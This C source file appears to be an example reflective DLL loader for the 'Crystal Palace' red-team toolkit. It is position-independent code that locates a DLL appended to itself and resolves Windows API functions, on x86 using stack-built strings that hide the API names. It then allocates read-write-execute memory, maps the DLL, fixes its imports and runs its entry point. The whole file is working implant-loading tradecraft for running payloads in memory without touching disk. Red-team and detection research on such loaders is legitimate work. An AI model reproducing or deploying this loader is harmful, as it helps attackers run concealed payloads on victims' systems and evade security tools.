/*
 * Copyright 2025 Raphael Mudge, Adversary Fan Fiction Writers Guild
 *
 * Redistribution and use in source and binary forms, with or without modification, are
 * permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this list of
 * conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice, this list of
 * conditions and the following disclaimer in the documentation and/or other materials provided
 * with the distribution.
 *
 * 3. Neither the name of the copyright holder nor the names of its contributors may be used to
 * endorse or promote products derived from this software without specific prior written
 * permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
 * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/* function prototypes */
void ReflectiveLoader();

/* this is the REAL entry point to this whole mess and it needs to go first! */
__attribute__((noinline, no_reorder)) void go() {
	ReflectiveLoader();
}

/*
 * loader.h is a refactored Reflective Loader and some macros/definitions we need.
 * it has several functions intended to be used across loaders.
 */
#include "loaderdefs.h"
#include "loader.h"

/* build a table of functions we need/want */
#define WIN32_FUNC( x ) __typeof__( x ) * x

typedef struct {
	WIN32_FUNC(LoadLibraryA);
	WIN32_FUNC(GetProcAddress);
	WIN32_FUNC(VirtualAlloc);
} WIN32FUNCS;

/*
 * Here's how to pull in x64 function pointers, linked from the .spec file, and use them
 *
 * x64 is the easiest, we can just set a global variable with the 'patch' command in the
 * .spec file. If all you need is x64, this is how I would do things.
 */
#ifdef WIN_X64
__typeof__(GetModuleHandle) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress)  * pGetProcAddress  __attribute__((section(".text")));

void findNeededFunctions(WIN32FUNCS * funcs) {
	HANDLE hModule = (char *)pGetModuleHandle("KERNEL32");

	funcs->LoadLibraryA   = (__typeof__(LoadLibraryA) *)   pGetProcAddress(hModule, "LoadLibraryA");
	funcs->GetProcAddress = (__typeof__(GetProcAddress) *) pGetProcAddress;
	funcs->VirtualAlloc   = (__typeof__(VirtualAlloc) *)   pGetProcAddress(hModule, "VirtualAlloc");
}
#endif

/*
 * Here's how to pull in x86 function pointers, linked from the .spec file, and use them
 *
 * It's a similar pattern to how we get our other appended resources. You could do this with
 * x64 PIC too. The x64 findGMH and findGPA would just return (char **)&__SYMBOL__. It would
 * work the same though.
 */
#ifdef WIN_X86
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)WIN_GET_CALLER(); }

char __GMHDATA__[0] __attribute__((section("gmh_data")));
char __GPADATA__[0] __attribute__((section("gpa_data")));

char ** findGMH() {
	return (char **)PTR_OFFSET(caller(), (ULONG_PTR)&__GMHDATA__ + 5);
}

char ** findGPA() {
	return (char **)PTR_OFFSET(caller(), (ULONG_PTR)&__GPADATA__ + 5);
}

void findNeededFunctions(WIN32FUNCS * funcs) {
	char k32_str[] = { 'K', 'E', 'R', 'N', 'E', 'L', '3', '2', 0 };
	char ll_str[]  = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0 };
	char va_str[]  = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0 };

	__typeof__(GetModuleHandle) * pGetModuleHandle = (__typeof__(GetModuleHandle) *)*findGMH();
	__typeof__(GetProcAddress)  * pGetProcAddress  = (__typeof__(GetProcAddress) *) *findGPA();

	HANDLE hModule = (char *)pGetModuleHandle(k32_str);

	funcs->LoadLibraryA   = (__typeof__(LoadLibraryA) *)   pGetProcAddress(hModule, ll_str);
	funcs->GetProcAddress = (__typeof__(GetProcAddress) *) pGetProcAddress;
	funcs->VirtualAlloc   = (__typeof__(VirtualAlloc) *)   pGetProcAddress(hModule, va_str);
}
#endif

/*
 * This is the Crystal Palace convention for getting ahold of data linked with this loader.
 */
char __DLLDATA__[0] __attribute__((section("my_data")));

#ifdef WIN_X86
char * findAppendedDLL() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__DLLDATA__ + 5);
}
#else
char * findAppendedDLL() {
	return (char *)&__DLLDATA__;
}
#endif

/*
 * Our reflective loader itself, have fun, go nuts!
 */
void ReflectiveLoader() {
	char       * dst;
	char       * src;
	DLLDATA      data;
	WIN32FUNCS   funcs;

	/* find our DLL appended to this PIC */
	src = findAppendedDLL();

	/* resolve the functions we'll need */
	findNeededFunctions(&funcs);

	/* parse our DLL! */
	ParseDLL(src, &data);

	/* allocate memory for it! */
	dst = funcs.VirtualAlloc( NULL, SizeOfDLL(&data), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );

	/* load the damned thing */
	LoadDLL(&data, src, dst);

		/* we cast (WIN32FUNCS *) to (IMPORTFUNCS *) and get away with it because the first two
		 * members are the same. See loader.h for the IMPORTFUNCS definition. */

	/* process the imports */
	ProcessImports((IMPORTFUNCS *)&funcs, &data, dst);

	/* excute it! */
	EntryPoint(&data, dst)((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL);
}
